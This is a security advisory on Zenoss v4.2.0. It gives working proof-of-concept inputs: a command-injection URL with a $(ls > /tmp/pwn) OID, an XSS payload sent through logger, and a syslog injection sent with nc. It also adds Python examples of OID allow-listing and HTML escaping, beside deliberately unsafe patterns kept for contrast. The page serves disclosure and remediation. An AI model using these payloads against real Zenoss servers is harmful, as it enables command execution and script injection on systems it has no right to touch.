Zenoss Security Bugs

Zenoss v4.2.0 contains a number of bugs that may be used to compromise a server running Zenoss.

  • The test_datasource feature doesn't escape the SNMP OID that Zenoss passes to the shell as an argument to the snmpwalk command, so shell metacharacters in the OID are interpreted.
    example: https://[ZENOSS_HOST]/zport/dmd/Devices/rrdTemplates/Device/datasources/sysUpTime/test_datasource?data={%22newId%22:%22DetectedVirus%22,%22oid%22:%22$%28ls%20%3E%20/tmp/pwn%29%22,%22enabled%22:%22on%22,%22testDevice%22:%22127.0.0.1%22,%22uid%22:%22%22}
    note: The device against which the snmpwalk is executed has to be known by Zenoss (127.0.0.1 in the example).
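The fix for this class of bug is to validate the OID against its actual grammar (dot-separated unsigned integers) and to hand it to snmpwalk as a single argv element so no shell ever parses it. The following is an added example written for this page, not Zenoss code; the function names, the default community string and the hostname check are assumptions.

```python
import re
import subprocess

# A numeric SNMP OID is an optional leading dot followed by dot-separated
# unsigned integers. Anything else ($(...), quotes, spaces, ;) is rejected.
_OID_RE = re.compile(r"\.?[0-9]+(?:\.[0-9]+)*")

# Conservative hostname / IPv4 literal check for the target device (assumed
# policy; a real deployment would look the device up in its own inventory).
_DEVICE_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,253}[A-Za-z0-9])?")


def is_valid_oid(oid):
    """True only if the whole string is a numeric OID (fullmatch, so a
    trailing newline or any extra character fails)."""
    return isinstance(oid, str) and _OID_RE.fullmatch(oid) is not None


def is_valid_device(device):
    return isinstance(device, str) and _DEVICE_RE.fullmatch(device) is not None


def unsafe_shell_command(device, oid):
    """Shape of the vulnerable pattern: untrusted input interpolated into a
    string that is later given to a shell. Kept here only for contrast;
    never pass its result to os.system() or subprocess with shell=True."""
    return "snmpwalk -v 2c -c public %s %s" % (device, oid)


def build_snmpwalk_argv(device, oid, community="public", version="2c"):
    """Return the argv list for snmpwalk. Each element reaches the process
    as one argument, so shell metacharacters in oid carry no meaning."""
    if not is_valid_device(device):
        raise ValueError("rejected device name: %r" % (device,))
    if not is_valid_oid(oid):
        raise ValueError("rejected OID: %r" % (oid,))
    return ["snmpwalk", "-v", version, "-c", community, device, oid]


def run_snmpwalk(device, oid):
    """Execute snmpwalk without a shell; returns the CompletedProcess."""
    argv = build_snmpwalk_argv(device, oid)
    return subprocess.run(argv, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Local demonstration: the injection payload from the advisory URL
    # (URL-decoded) is rejected before any process is started.
    for candidate in ("1.3.6.1.2.1.1.3.0", "$(ls > /tmp/pwn)"):
        try:
            print(build_snmpwalk_argv("127.0.0.1", candidate))
        except ValueError as exc:
            print("blocked:", exc)
```

Allow-listing the OID syntax is preferable to escaping: escaping has to anticipate every shell quoting rule, while a fullmatch against the OID grammar leaves nothing for a shell to interpret even if a later refactor reintroduces `shell=True`.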

  • Zenoss doesn't filter SNMP strings before displaying them in the web interface. This results in an XSS vulnerability on the device detail page.

  • evconsole XSS (the original post included a screenshot). Either of the following delivers a message containing markup to the event console, via the local logger and via syslog over UDP to port 514:
# logger -p local0.crit '<img src="http://wikee.iphwn.org/_media/s5l8900:pwned.gif?cache=" onload="javascript:alert(2)" />'

# echo '<130>' Aug 29 07:17:34 test '<iframe />' | nc -u zenoss 514
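Both XSS bugs above (SNMP strings on the device detail page and syslog messages in the event console) share one root cause: text that arrives from a monitored device or from the network is placed into HTML without escaping. The example below is added for this page and is not Zenoss code; it parses a BSD-style syslog line like the one in the advisory and shows the unescaped rendering beside the escaped one. The sample messages are constructed, modelled on the PoC lines, and the function names are assumptions.

```python
import html
import re

# Constructed samples modelled on the advisory's PoC lines (not captured
# from a live Zenoss instance).
SAMPLE_SYSLOG_LINE = "<130> Aug 29 07:17:34 test <iframe />"
SAMPLE_SNMP_SYSDESCR = '<img src="x.gif" onload="javascript:alert(2)" />'

# BSD syslog: "<PRI>" followed by the rest of the message. PRI = facility*8 + severity.
_PRI_RE = re.compile(r"<(\d{1,3})>(.*)", re.DOTALL)

FACILITY_NAMES = {16: "local0", 17: "local1", 18: "local2", 19: "local3",
                  20: "local4", 21: "local5", 22: "local6", 23: "local7"}
SEVERITY_NAMES = ["emerg", "alert", "crit", "err", "warning", "notice",
                  "info", "debug"]


def parse_syslog(line):
    """Split a syslog datagram into facility, severity and free-text message.
    The message is returned verbatim: parsing is not sanitising."""
    m = _PRI_RE.fullmatch(line)
    if not m:
        raise ValueError("missing <PRI> header")
    pri = int(m.group(1))
    if pri > 191:
        raise ValueError("PRI out of range: %d" % pri)
    return {
        "facility": FACILITY_NAMES.get(pri // 8, str(pri // 8)),
        "severity": SEVERITY_NAMES[pri % 8],
        "message": m.group(2).strip(),
    }


def render_cell_unsafe(value):
    """The vulnerable pattern: untrusted text concatenated into markup."""
    return "<td>%s</td>" % value


def render_cell(value):
    """Hardened form: escape at the point where text meets HTML. quote=True
    also encodes quotes, so the value is safe inside attributes as well."""
    return "<td>%s</td>" % html.escape(str(value), quote=True)


def contains_markup(rendered, inner):
    """True if the untrusted inner text survived into the output unescaped."""
    return inner in rendered


if __name__ == "__main__":
    event = parse_syslog(SAMPLE_SYSLOG_LINE)
    print(event)                       # facility local0, severity crit
    print(render_cell_unsafe(event["message"]))
    print(render_cell(event["message"]))
    print(render_cell(SAMPLE_SNMP_SYSDESCR))
```

Note that PRI 130 decodes to local0.crit, which is exactly the priority the `logger -p local0.crit` command in the advisory sends; the two PoC lines are the same message arriving by two routes, and the same output-side escaping neutralises both.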
